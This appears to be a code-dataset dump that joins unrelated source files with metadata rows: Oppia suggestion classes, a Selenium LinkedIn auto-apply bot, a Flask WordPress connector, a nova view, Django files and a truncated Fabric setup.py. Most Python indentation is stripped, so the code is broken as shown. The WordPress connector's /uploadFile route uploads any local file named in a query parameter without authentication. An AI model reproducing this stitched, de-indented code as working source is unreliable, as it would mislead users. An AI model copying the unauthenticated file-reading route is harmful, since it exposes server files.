"""Initializes an object of type SuggestionTranslateContent
corresponding to the SUGGESTION_TYPE_TRANSLATE_CONTENT choice.
"""
super(SuggestionTranslateContent, self).__init__(
status, final_reviewer_id)
self.suggestion_id = suggestion_id
self.suggestion_type = (
suggestion_models.SUGGESTION_TYPE_TRANSLATE_CONTENT)
self.target_type = suggestion_models.TARGET_TYPE_EXPLORATION
self.target_id = target_id
self.target_version_at_submission = target_version_at_submission
self.author_id = author_id
self.change = exp_domain.ExplorationChange(change)
self.score_category = score_category
self.last_updated = last_updated
def validate(self):
"""Validates a suggestion object of type SuggestionTranslateContent.
Raises:
ValidationError. One or more attributes of the
SuggestionTranslateContent object are invalid.
"""
super(SuggestionTranslateContent, self).validate()
if not isinstance(self.change, exp_domain.ExplorationChange):
raise utils.ValidationError(
'Expected change to be an ExplorationChange, received %s'
% type(self.change))
# The score sub_type needs to match the validation for exploration
# category, i.e the second part of the score_category should match
# the target exploration's category and we have a prod validation
# for the same.
if self.get_score_type() != suggestion_models.SCORE_TYPE_TRANSLATION:
raise utils.ValidationError(
'Expected the first part of score_category to be %s '
', received %s' % (
suggestion_models.SCORE_TYPE_TRANSLATION,
self.get_score_type()))
if self.change.cmd != exp_domain.CMD_ADD_TRANSLATION:
raise utils.ValidationError(
'Expected cmd to be %s, received %s' % (
exp_domain.CMD_ADD_TRANSLATION, self.change.cmd))
if not utils.is_supported_audio_language_code(
self.change.language_code):
raise utils.ValidationError(
'Invalid language_code: %s' % self.change.language_code)
def pre_accept_validate(self):
"""Performs referential validation. This function needs to be called
before accepting the suggestion.
"""
self.validate()
exploration = exp_fetchers.get_exploration_by_id(self.target_id)
if self.change.state_name not in exploration.states:
raise utils.ValidationError(
'Expected %s to be a valid state name' % self.change.state_name)
content_html = exploration.get_content_html(
self.change.state_name, self.change.content_id)
if content_html != self.change.content_html:
raise Exception(
'The given content_html does not match the content of the '
'exploration.')
def accept(self, commit_message):
"""Accepts the suggestion.
Args:
commit_message: str. The commit message.
"""
exp_services.update_exploration(
self.final_reviewer_id, self.target_id, [self.change],
commit_message, is_suggestion=True)
def get_all_html_content_strings(self):
"""Gets all html content strings used in this suggestion.
Returns:
list(str). The list of html content strings.
"""
return [self.change.translation_html, self.change.content_html]
def convert_html_in_suggestion_change(self, conversion_fn):
"""Checks for HTML fields in a suggestion change and converts it
according to the conversion function.
Args:
conversion_fn: function. The function to be used for converting the
HTML.
"""
self.change.content_html = (
conversion_fn(self.change.content_html))
self.change.translation_html = (
conversion_fn(self.change.translation_html))
class SuggestionAddQuestion(BaseSuggestion):
"""Domain object for a suggestion of type SUGGESTION_TYPE_ADD_QUESTION.
Attributes:
suggestion_id: str. The ID of the suggestion.
suggestion_type: str. The type of the suggestion.
target_type: str. The type of target entity being edited, for this
subclass, target type is 'skill'.
target_id: str. The ID of the skill the question was submitted to.
target_version_at_submission: int. The version number of the target
topic at the time of creation of the suggestion.
status: str. The status of the suggestion.
author_id: str. The ID of the user who submitted the suggestion.
final_reviewer_id: str. The ID of the reviewer who has accepted/rejected
the suggestion.
change_cmd: QuestionChange. The change associated with the suggestion.
score_category: str. The scoring category for the suggestion.
last_updated: datetime.datetime. Date and time when the suggestion
was last updated.
"""
def __init__(
self, suggestion_id, target_id, target_version_at_submission,
status, author_id, final_reviewer_id,
change, score_category, last_updated=None):
"""Initializes an object of type SuggestionAddQuestion
corresponding to the SUGGESTION_TYPE_ADD_QUESTION choice.
"""
super(SuggestionAddQuestion, self).__init__(status, final_reviewer_id)
self.suggestion_id = suggestion_id
self.suggestion_type = suggestion_models.SUGGESTION_TYPE_ADD_QUESTION
self.target_type = suggestion_models.TARGET_TYPE_SKILL
self.target_id = target_id
self.target_version_at_submission = target_version_at_submission
self.author_id = author_id
self.change = question_domain.QuestionSuggestionChange(change)
# Update question_state_data_schema_version here instead of surfacing
# the version in the frontend.
self.change.question_dict['question_state_data_schema_version'] = (
feconf.CURRENT_STATE_SCHEMA_VERSION)
self.score_category = score_category
self.last_updated = last_updated
def validate(self):
"""Validates a suggestion object of type SuggestionAddQuestion.
Raises:
ValidationError. One or more attributes of the SuggestionAddQuestion
object are invalid.
"""
super(SuggestionAddQuestion, self).validate()
if self.get_score_type() != suggestion_models.SCORE_TYPE_QUESTION:
raise utils.ValidationError(
'Expected the first part of score_category to be "%s" '
', received "%s"' % (
suggestion_models.SCORE_TYPE_QUESTION,
self.get_score_type()))
if not isinstance(
self.change, question_domain.QuestionSuggestionChange):
raise utils.ValidationError(
'Expected change to be an instance of QuestionSuggestionChange')
if not self.change.cmd:
raise utils.ValidationError('Expected change to contain cmd')
if (
self.change.cmd !=
question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION):
raise utils.ValidationError('Expected cmd to be %s, obtained %s' % (
question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
self.change.cmd))
if not self.change.question_dict:
raise utils.ValidationError(
'Expected change to contain question_dict')
if not self.change.skill_difficulty:
raise utils.ValidationError(
'Expected change to contain skill_difficulty')
skill_difficulties = list(
constants.SKILL_DIFFICULTY_LABEL_TO_FLOAT.values())
if self._get_skill_difficulty() not in skill_difficulties:
raise utils.ValidationError(
'Expected change skill_difficulty to be one of %s, found %s '
% (skill_difficulties, self._get_skill_difficulty()))
question = question_domain.Question(
None, state_domain.State.from_dict(
self.change.question_dict['question_state_data']),
self.change.question_dict['question_state_data_schema_version'],
self.change.question_dict['language_code'], None,
self.change.question_dict['linked_skill_ids'],
self.change.question_dict['inapplicable_misconception_ids'])
question.partial_validate()
question_state_data_schema_version = (
self.change.question_dict['question_state_data_schema_version'])
if not (
question_state_data_schema_version >= 1 and
question_state_data_schema_version <=
feconf.CURRENT_STATE_SCHEMA_VERSION):
raise utils.ValidationError(
'Expected question state schema version to be between 1 and '
'%s' % feconf.CURRENT_STATE_SCHEMA_VERSION)
def pre_accept_validate(self):
"""Performs referential validation. This function needs to be called
before accepting the suggestion.
"""
if self.change.skill_id is None:
raise utils.ValidationError('Expected change to contain skill_id')
question_dict = self.change.question_dict
self.validate()
if (
question_dict['question_state_data_schema_version'] !=
feconf.CURRENT_STATE_SCHEMA_VERSION):
raise utils.ValidationError(
'Question state schema version is not up to date.')
skill_domain.Skill.require_valid_skill_id(self.change.skill_id)
skill = skill_fetchers.get_skill_by_id(
self.change.skill_id, strict=False)
if skill is None:
raise utils.ValidationError(
'The skill with the given id doesn\'t exist.')
def get_change_list_for_accepting_suggestion(self):
pass
def accept(self, unused_commit_message):
"""Accepts the suggestion.
Args:
unused_commit_message: str. This parameter is passed in for
consistency with the existing suggestions. As a default commit
message is used in the add_question function, the arg is unused.
"""
question_dict = self.change.question_dict
question_dict['version'] = 1
question_dict['id'] = (
question_services.get_new_question_id())
html_list = self.get_all_html_content_strings()
filenames = (
html_cleaner.get_image_filenames_from_html_strings(html_list))
image_context = fs_services.get_image_context_for_suggestion_target(
self.target_type)
fs_services.copy_images(
image_context, self.target_id, feconf.ENTITY_TYPE_QUESTION,
self.target_id, filenames)
question_dict['linked_skill_ids'] = [self.change.skill_id]
question = question_domain.Question.from_dict(question_dict)
question.validate()
question_services.add_question(self.author_id, question)
skill = skill_fetchers.get_skill_by_id(
self.change.skill_id, strict=False)
if skill is None:
raise utils.ValidationError(
'The skill with the given id doesn\'t exist.')
question_services.create_new_question_skill_link(
self.author_id, question_dict['id'], self.change.skill_id,
self._get_skill_difficulty())
def populate_old_value_of_change(self):
"""Populates old value of the change."""
pass
def pre_update_validate(self, change):
"""Performs the pre update validation. This functions need to be called
before updating the suggestion.
Args:
change: QuestionChange. The new change.
Raises:
ValidationError. Invalid new change.
"""
if self.change.cmd != change.cmd:
raise utils.ValidationError(
'The new change cmd must be equal to %s' %
self.change.cmd)
if self.change.skill_id != change.skill_id:
raise utils.ValidationError(
'The new change skill_id must be equal to %s' %
self.change.skill_id)
if self.change.question_dict == change.question_dict:
raise utils.ValidationError(
'The new change question_dict must not be equal to the old '
'question_dict')
def _get_skill_difficulty(self):
"""Returns the suggestion's skill difficulty."""
return self.change.skill_difficulty
def get_all_html_content_strings(self):
"""Gets all html content strings used in this suggestion.
Returns:
list(str). The list of html content strings.
"""
state_object = (
state_domain.State.from_dict(
self.change.question_dict['question_state_data']))
html_string_list = state_object.get_all_html_content_strings()
return html_string_list
def convert_html_in_suggestion_change(self, conversion_fn):
"""Checks for HTML fields in the suggestion change and converts it
according to the conversion function.
Args:
conversion_fn: function. The function to be used for converting the
HTML.
"""
self.change.question_dict['question_state_data'] = (
state_domain.State.convert_html_fields_in_state(
self.change.question_dict['question_state_data'],
conversion_fn,
state_uses_old_interaction_cust_args_schema=(
self.change.question_dict[
'question_state_data_schema_version'] < 37)
)
)
class BaseVoiceoverApplication(python_utils.OBJECT):
"""Base class for a voiceover application."""
def __init__(self):
"""Initializes a GeneralVoiceoverApplication object."""
raise NotImplementedError(
'Subclasses of BaseVoiceoverApplication should implement __init__.')
def to_dict(self):
"""Returns a dict representation of a voiceover application object.
Returns:
dict. A dict representation of a voiceover application object.
"""
return {
'voiceover_application_id': self.voiceover_application_id,
'target_type': self.target_type,
'target_id': self.target_id,
'status': self.status,
'author_name': self.get_author_name(),
'final_reviewer_name': (
None if self.final_reviewer_id is None else (
self.get_final_reviewer_name())),
'language_code': self.language_code,
'content': self.content,
'filename': self.filename,
'rejection_message': self.rejection_message
}
def get_author_name(self):
"""Returns the author's username.
Returns:
str. The username of the author of the voiceover application.
"""
return user_services.get_username(self.author_id)
def get_final_reviewer_name(self):
"""Returns the reviewer's username.
Returns:
str. The username of the reviewer of the voiceover application.
"""
return user_services.get_username(self.final_reviewer_id)
def validate(self):
"""Validates the BaseVoiceoverApplication object.
Raises:
ValidationError. One or more attributes of the
BaseVoiceoverApplication object are invalid.
"""
if self.target_type not in suggestion_models.TARGET_TYPE_CHOICES:
raise utils.ValidationError(
'Expected target_type to be among allowed choices, '
'received %s' % self.target_type)
if not isinstance(self.target_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected target_id to be a string, received %s' % type(
self.target_id))
if self.status not in suggestion_models.STATUS_CHOICES:
raise utils.ValidationError(
'Expected status to be among allowed choices, '
'received %s' % self.status)
if not isinstance(self.author_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected author_id to be a string, received %s' % type(
self.author_id))
if self.status == suggestion_models.STATUS_IN_REVIEW:
if self.final_reviewer_id is not None:
raise utils.ValidationError(
'Expected final_reviewer_id to be None as the '
'voiceover application is not yet handled.')
else:
if not isinstance(self.final_reviewer_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected final_reviewer_id to be a string, received %s' % (
type(self.final_reviewer_id)))
if self.status == suggestion_models.STATUS_REJECTED:
if not isinstance(
self.rejection_message, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected rejection_message to be a string for a '
'rejected application, received %s' % type(
                        self.rejection_message))
if self.status == suggestion_models.STATUS_ACCEPTED:
if self.rejection_message is not None:
raise utils.ValidationError(
'Expected rejection_message to be None for the '
'accepted voiceover application, received %s' % (
self.rejection_message))
if not isinstance(self.language_code, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected language_code to be a string, received %s' %
self.language_code)
if not utils.is_supported_audio_language_code(self.language_code):
raise utils.ValidationError(
'Invalid language_code: %s' % self.language_code)
if not isinstance(self.filename, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected filename to be a string, received %s' % type(
self.filename))
if not isinstance(self.content, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected content to be a string, received %s' % type(
self.content))
def accept(self):
"""Accepts the voiceover application. Each subclass must implement this
function.
"""
raise NotImplementedError(
'Subclasses of BaseVoiceoverApplication should implement accept.')
def reject(self):
"""Rejects the voiceover application. Each subclass must implement this
function.
"""
raise NotImplementedError(
'Subclasses of BaseVoiceoverApplication should implement reject.')
@property
def is_handled(self):
"""Returns true if the voiceover application has either been accepted or
rejected.
Returns:
bool. Whether the voiceover application has been handled or not.
"""
return self.status != suggestion_models.STATUS_IN_REVIEW
class ExplorationVoiceoverApplication(BaseVoiceoverApplication):
"""Domain object for a voiceover application for exploration."""
def __init__( # pylint: disable=super-init-not-called
self, voiceover_application_id, target_id, status, author_id,
final_reviewer_id, language_code, filename, content,
rejection_message):
"""Initializes a ExplorationVoiceoverApplication domain object.
Args:
voiceover_application_id: str. The ID of the voiceover application.
target_id: str. The ID of the target entity.
status: str. The status of the voiceover application.
author_id: str. The ID of the user who submitted the voiceover
application.
final_reviewer_id: str|None. The ID of the reviewer who has
accepted/rejected the voiceover application.
language_code: str. The language code for the voiceover application.
filename: str. The filename of the voiceover audio.
content: str. The html content which is voiceover in the
application.
rejection_message: str. The plain text message submitted by the
reviewer while rejecting the application.
"""
self.voiceover_application_id = voiceover_application_id
self.target_type = suggestion_models.TARGET_TYPE_EXPLORATION
self.target_id = target_id
self.status = status
self.author_id = author_id
self.final_reviewer_id = final_reviewer_id
self.language_code = language_code
self.filename = filename
self.content = content
self.rejection_message = rejection_message
def accept(self, reviewer_id):
"""Accepts the voiceover application and updates the final_reviewer_id.
Args:
reviewer_id: str. The user ID of the reviewer.
"""
self.final_reviewer_id = reviewer_id
self.status = suggestion_models.STATUS_ACCEPTED
self.validate()
def reject(self, reviewer_id, rejection_message):
"""Rejects the voiceover application, updates the final_reviewer_id and
adds rejection message.
Args:
reviewer_id: str. The user ID of the reviewer.
rejection_message: str. The rejection message submitted by the
reviewer.
"""
self.status = suggestion_models.STATUS_REJECTED
self.final_reviewer_id = reviewer_id
self.rejection_message = rejection_message
self.validate()
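# Illustrative sketch (hypothetical usage, not part of the original module): a
# reviewer handling a pending exploration voiceover application. The argument
# values are made up; the constructor signature is the one defined above.
#
#   application = ExplorationVoiceoverApplication(
#       'application_id', 'exp_1', suggestion_models.STATUS_IN_REVIEW,
#       'author_id', None, 'en', 'voiceover.mp3', '<p>Content</p>', None)
#   application.accept('reviewer_id')
#   # or: application.reject('reviewer_id', 'Audio quality is too low.')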
VOICEOVER_APPLICATION_TARGET_TYPE_TO_DOMAIN_CLASSES = {
suggestion_models.TARGET_TYPE_EXPLORATION: (
ExplorationVoiceoverApplication)
}
SUGGESTION_TYPES_TO_DOMAIN_CLASSES = {
suggestion_models.SUGGESTION_TYPE_EDIT_STATE_CONTENT: (
SuggestionEditStateContent),
suggestion_models.SUGGESTION_TYPE_TRANSLATE_CONTENT: (
SuggestionTranslateContent),
suggestion_models.SUGGESTION_TYPE_ADD_QUESTION: SuggestionAddQuestion
}
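# Illustrative sketch (hypothetical, not part of the original module): how a
# caller might use the mapping above to dispatch a stored suggestion to the
# right domain class. `suggestion_model` and its attribute names are assumed
# for the example.
#
#   suggestion_class = SUGGESTION_TYPES_TO_DOMAIN_CLASSES[
#       suggestion_model.suggestion_type]
#   suggestion = suggestion_class(
#       suggestion_model.id, suggestion_model.target_id,
#       suggestion_model.target_version_at_submission, suggestion_model.status,
#       suggestion_model.author_id, suggestion_model.final_reviewer_id,
#       suggestion_model.change_cmd, suggestion_model.score_category,
#       suggestion_model.last_updated)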
| 41.577154
| 80
| 0.645973
|
794fe8a5c3c8d0da7b3e12f368b37f164db1f50e
| 2,205
|
py
|
Python
|
Day49/main.py
|
SSRout/100-days-of-code
|
7aafa7789a57bf701b60043fa2bf8fb61b64bfb5
|
[
"MIT"
] | null | null | null |
Day49/main.py
|
SSRout/100-days-of-code
|
7aafa7789a57bf701b60043fa2bf8fb61b64bfb5
|
[
"MIT"
] | null | null | null |
Day49/main.py
|
SSRout/100-days-of-code
|
7aafa7789a57bf701b60043fa2bf8fb61b64bfb5
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
import time
# Placeholder strings: replace these with your own credentials and driver path.
ACCOUNT_EMAIL = "YOUR LOGIN EMAIL"
ACCOUNT_PASSWORD = "YOUR LOGIN PASSWORD"
PHONE = "YOUR PHONE NUMBER"
chrome_driver_path = "YOUR CHROME DRIVER PATH"
driver = webdriver.Chrome(chrome_driver_path)
driver.get("https://www.linkedin.com/jobs/search/?f_LF=f_AL&geoId=102257491&keywords=marketing%20intern&location=London%2C%20England%2C%20United%20Kingdom&redirect=false&position=1&pageNum=0")
time.sleep(2)
sign_in_button = driver.find_element_by_link_text("Sign in")
sign_in_button.click()
time.sleep(5)
email_field = driver.find_element_by_id("username")
email_field.send_keys(ACCOUNT_EMAIL)
password_field = driver.find_element_by_id("password")
password_field.send_keys(ACCOUNT_PASSWORD)
password_field.send_keys(Keys.ENTER)
time.sleep(5)
all_listings = driver.find_elements_by_css_selector(".job-card-container--clickable")
for listing in all_listings:
print("called")
listing.click()
time.sleep(2)
try:
apply_button = driver.find_element_by_css_selector(".jobs-s-apply button")
apply_button.click()
time.sleep(5)
phone = driver.find_element_by_class_name("fb-single-line-text__input")
if phone.text == "":
phone.send_keys(PHONE)
submit_button = driver.find_element_by_css_selector("footer button")
if submit_button.get_attribute("data-control-name") == "continue_unify":
close_button = driver.find_element_by_class_name("artdeco-modal__dismiss")
close_button.click()
time.sleep(2)
discard_button = driver.find_elements_by_class_name("artdeco-modal__confirm-dialog-btn")[1]
discard_button.click()
print("Complex application, skipped.")
continue
else:
submit_button.click()
time.sleep(2)
close_button = driver.find_element_by_class_name("artdeco-modal__dismiss")
close_button.click()
except NoSuchElementException:
print("No application button, skipped.")
continue
time.sleep(5)
driver.quit()
| 33.409091
| 192
| 0.724717
|
794fea70c868b926769b8f3adb50ca1c6e38f9e2
| 4,146
|
py
|
Python
|
Connectors/WordPress/webservice.py
|
tjgillies/Locker
|
420f80f1ce6022a8502c01c36b1dafb8faf438ba
|
[
"BSD-3-Clause"
] | 1
|
2015-11-05T11:33:55.000Z
|
2015-11-05T11:33:55.000Z
|
Connectors/WordPress/webservice.py
|
tjgillies/Locker
|
420f80f1ce6022a8502c01c36b1dafb8faf438ba
|
[
"BSD-3-Clause"
] | null | null | null |
Connectors/WordPress/webservice.py
|
tjgillies/Locker
|
420f80f1ce6022a8502c01c36b1dafb8faf438ba
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
import json
import logging
from flask import Flask, render_template, request, redirect, url_for
sys.path.append("../../Common/python")
import lockerfs
import client
import util
import xmlrpclib
import os
app = Flask(__name__)
@app.route("/setupAuth")
def setupAuth():
return render_template("setupAuth.html")
@app.route("/save", methods=['POST'])
def saveAuth():
logging.info("Saving auth")
secrets = lockerfs.loadJsonFile("secrets.json")
secrets["url"] = request.form["url"]
secrets["user"] = request.form["user"]
secrets["password"] = request.form["password"]
secrets["server_type"] = "wordpress" # !!! other types are awaiting testing
start(secrets)
lockerfs.saveJsonFile("secrets.json", secrets)
return json.dumps("started")
def start(secrets):
logging.info("Starting")
app.client = client.Client(app.info, url=secrets["url"], user=secrets["user"], password=secrets["password"], server_type=secrets["server_type"])
app.started = True
@app.route("/update")
def update():
if app.client:
app.client.update()
return json.dumps("updated")
else:
return json.dumps("no login")
@app.route("/")
def index():
if app.started:
return json.dumps({
"/info" : "User info",
"/blogs" : "List of users blogs",
"/posts" : "List of users posts",
"/comments" : "Comments on users posts",
"/pingbacks" : "Pingbacks to users blogs",
"/trackbacks" : "Trackbacks to users blogs",
"/update" : "update to refresh info"
})
else:
return redirect(lockerfs.loadMeData()["uri"] + "setupAuth")
def matches_arg(value, arg):
# either a literal match or a range [lo,hi]
    if type(arg) is list and len(arg) == 2:
(lo, hi) = arg
return (lo <= value) and (value < hi)
else:
return (value == arg)
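# Illustrative examples (not part of the original module) of how matches_arg
# drives the query filtering in the routes below; the field names used here
# (postid, status) are hypothetical:
#
#   GET /posts?postid=[10,20]       -> posts whose postid lies in [10, 20)
#   GET /comments?status="approve"  -> comments whose status equals "approve"
#
# Each query-string value is JSON-decoded before being handed to matches_arg.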
@app.route("/info")
def info():
return json.dumps(app.client.user_info)
@app.route("/blogs")
def blogs():
blogs = app.client.blogs
for key, value in request.args.items():
blogs = [blog for blog in blogs if matches_arg(blog[key], json.loads(value))]
return json.dumps(blogs)
@app.route("/posts")
def posts():
posts = app.client.posts
for key, value in request.args.items():
posts = [post for post in posts if matches_arg(post[key], json.loads(value))]
return json.dumps(posts)
@app.route("/comments")
def comments():
comments = app.client.comments
for key, value in request.args.items():
comments = [comment for comment in comments if matches_arg(comment[key], json.loads(value))]
return json.dumps(comments)
@app.route("/pingbacks")
def pingbacks():
pingbacks = app.client.pingbacks
for key, value in request.args.items():
pingbacks = [pingback for pingback in pingbacks if matches_arg(pingback[key], json.loads(value))]
return json.dumps(pingbacks)
@app.route("/trackbacks")
def trackbacks():
trackbacks = app.client.trackbacks
for key, value in request.args.items():
trackbacks = [trackback for trackback in trackbacks if matches_arg(trackback[key], json.loads(value))]
return json.dumps(trackbacks)
@app.route("/uploadFile")
def uploadFile():
f = request.args["file"]
data = {}
data["name"] = os.path.basename(f)
data["type"] = "image/jpeg"
data["bits"] = xmlrpclib.Binary(open(f).read())
data["overwrite"] = 1
app.client._server.wp.uploadFile('', app.client.user, app.client.password, data)
return "kthxbye"
def runService(info):
app.info = info
app.client = None
app.started = False
secrets = lockerfs.loadJsonFile("secrets.json")
if "url" in secrets and "user" in secrets and "password" in secrets:
start(secrets)
else:
logging.info("No auth details available")
app.debug = True
app.run(port=app.info["port"], use_reloader=False)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO,
format='%(levelname)-8s %(message)s')
runService({"port": 7474})
| 30.485294
| 148
| 0.638929
|
794feb5bad6a6e38b8e8a889fc828d7f46c9ac43
| 1,702
|
py
|
Python
|
nova/api/openstack/compute/views/addresses.py
|
russellb/nova
|
99c2e02b44a1012c8e26fc7658dc40ec4620a1ee
|
[
"Apache-2.0"
] | 1
|
2015-07-15T08:51:16.000Z
|
2015-07-15T08:51:16.000Z
|
nova/api/openstack/compute/views/addresses.py
|
russellb/nova
|
99c2e02b44a1012c8e26fc7658dc40ec4620a1ee
|
[
"Apache-2.0"
] | 1
|
2020-07-24T14:14:13.000Z
|
2020-07-24T14:14:13.000Z
|
nova/api/openstack/compute/views/addresses.py
|
russellb/nova
|
99c2e02b44a1012c8e26fc7658dc40ec4620a1ee
|
[
"Apache-2.0"
] | 2
|
2019-06-12T00:52:15.000Z
|
2020-07-24T10:35:29.000Z
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010-2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
from nova.api.openstack import common
from nova import flags
from nova import log as logging
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
class ViewBuilder(common.ViewBuilder):
"""Models server addresses as a dictionary."""
_collection_name = "addresses"
def basic(self, ip):
"""Return a dictionary describing an IP address."""
return {
"version": ip["version"],
"addr": ip["address"],
}
def show(self, network, label):
"""Returns a dictionary describing a network."""
all_ips = itertools.chain(network["ips"], network["floating_ips"])
return {label: [self.basic(ip) for ip in all_ips]}
def index(self, networks):
"""Return a dictionary describing a list of networks."""
addresses = {}
for label, network in networks.items():
network_dict = self.show(network, label)
addresses[label] = network_dict[label]
return dict(addresses=addresses)
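# Illustrative example (not part of the original module) of the dictionary
# shape produced by this view builder, assuming a single fixed-IP network:
#
#   networks = {'private': {'ips': [{'version': 4, 'address': '10.0.0.3'}],
#                           'floating_ips': []}}
#   ViewBuilder().index(networks)
#   # -> {'addresses': {'private': [{'version': 4, 'addr': '10.0.0.3'}]}}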
| 32.113208
| 78
| 0.673325
|
794fec61d2e6c7bcd2e3259336a3fed2b499024c
| 395
|
py
|
Python
|
memmories/asgi.py
|
EidAbdullahi/gallery-application
|
b1a0952b3d111408c33d7ec279f5d1d5b35638c6
|
[
"Info-ZIP"
] | null | null | null |
memmories/asgi.py
|
EidAbdullahi/gallery-application
|
b1a0952b3d111408c33d7ec279f5d1d5b35638c6
|
[
"Info-ZIP"
] | null | null | null |
memmories/asgi.py
|
EidAbdullahi/gallery-application
|
b1a0952b3d111408c33d7ec279f5d1d5b35638c6
|
[
"Info-ZIP"
] | null | null | null |
"""
ASGI config for memmories project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'memmories.settings')
application = get_asgi_application()
| 23.235294
| 78
| 0.787342
|
794feda5e6eb8570322380edee0e8793a241634d
| 5,274
|
py
|
Python
|
cride/users/migrations/0001_initial.py
|
MrRomo/cride
|
9ceef8169b6ad49fd3063758898b03abcb47f682
|
[
"MIT"
] | null | null | null |
cride/users/migrations/0001_initial.py
|
MrRomo/cride
|
9ceef8169b6ad49fd3063758898b03abcb47f682
|
[
"MIT"
] | null | null | null |
cride/users/migrations/0001_initial.py
|
MrRomo/cride
|
9ceef8169b6ad49fd3063758898b03abcb47f682
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.1 on 2020-11-24 00:39
from django.conf import settings
import django.contrib.auth.models
import django.contrib.auth.validators
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('created', models.DateTimeField(auto_now_add=True, help_text='Date time on which the object was created.', verbose_name='created at')),
('modified', models.DateTimeField(auto_now=True, help_text='Date time on which the object was last modified.', verbose_name='modified at')),
('email', models.EmailField(error_messages={'unique': 'A user with that email already exists.'}, max_length=254, unique=True, verbose_name='email address')),
('phone_number', models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message='Phone number must be entered in the format: +999999999. Up to 15 digits allowed.', regex='\\+?1?\\d{9,15}$')])),
('is_client', models.BooleanField(default=True, help_text='Help easily distinguish users and perform queries. Clients are the main type of user.', verbose_name='client')),
('is_verified', models.BooleanField(default=True, help_text='Set to true when the user have verified its email address.', verbose_name='verified')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'ordering': ['-created', '-modified'],
'get_latest_by': 'created',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, help_text='Date time on which the object was created.', verbose_name='created at')),
('modified', models.DateTimeField(auto_now=True, help_text='Date time on which the object was last modified.', verbose_name='modified at')),
('picture', models.ImageField(blank=True, null=True, upload_to='users/pictures/', verbose_name='profile picture')),
('biography', models.TextField(blank=True, max_length=500)),
('rides_taken', models.PositiveIntegerField(default=0)),
('rides_offered', models.PositiveIntegerField(default=0)),
('reputation', models.FloatField(default=5.0, help_text="User's reputation based on the rides taken and offered.")),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-created', '-modified'],
'get_latest_by': 'created',
'abstract': False,
},
),
]
| 73.25
| 329
| 0.658324
|
794fee25dc427259929694990bd4731534be77d3
| 2,169
|
py
|
Python
|
setup.py
|
aleszoulek/fabric
|
586518f89c9341fbbba6a29d62bd052f2edcb319
|
[
"BSD-2-Clause"
] | 1
|
2022-02-18T05:31:07.000Z
|
2022-02-18T05:31:07.000Z
|
setup.py
|
aleszoulek/fabric
|
586518f89c9341fbbba6a29d62bd052f2edcb319
|
[
"BSD-2-Clause"
] | null | null | null |
setup.py
|
aleszoulek/fabric
|
586518f89c9341fbbba6a29d62bd052f2edcb319
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
import sys
from setuptools import setup, find_packages
from fabric.version import get_version
readme = open('README').read()
long_description = """
To find out what's new in this version of Fabric, please see `the changelog
<http://docs.fabfile.org/changes/%s.html>`_.
----
%s
----
For more information, please see the Fabric website or execute ``fab --help``.
""" % (get_version('short'), readme)
# PyCrypto>2.0 + Python 2.5 + pip == bad times.
# We can't easily detect pip usage at this point, but we can at least limit our
# "downgrade" of the PyCrypto requirement to 2.5-only.
PYCRYPTO = "<2.1" if (sys.version_info[:2] == (2, 5)) else ">=1.9"
setup(
name='Fabric',
version=get_version('short'),
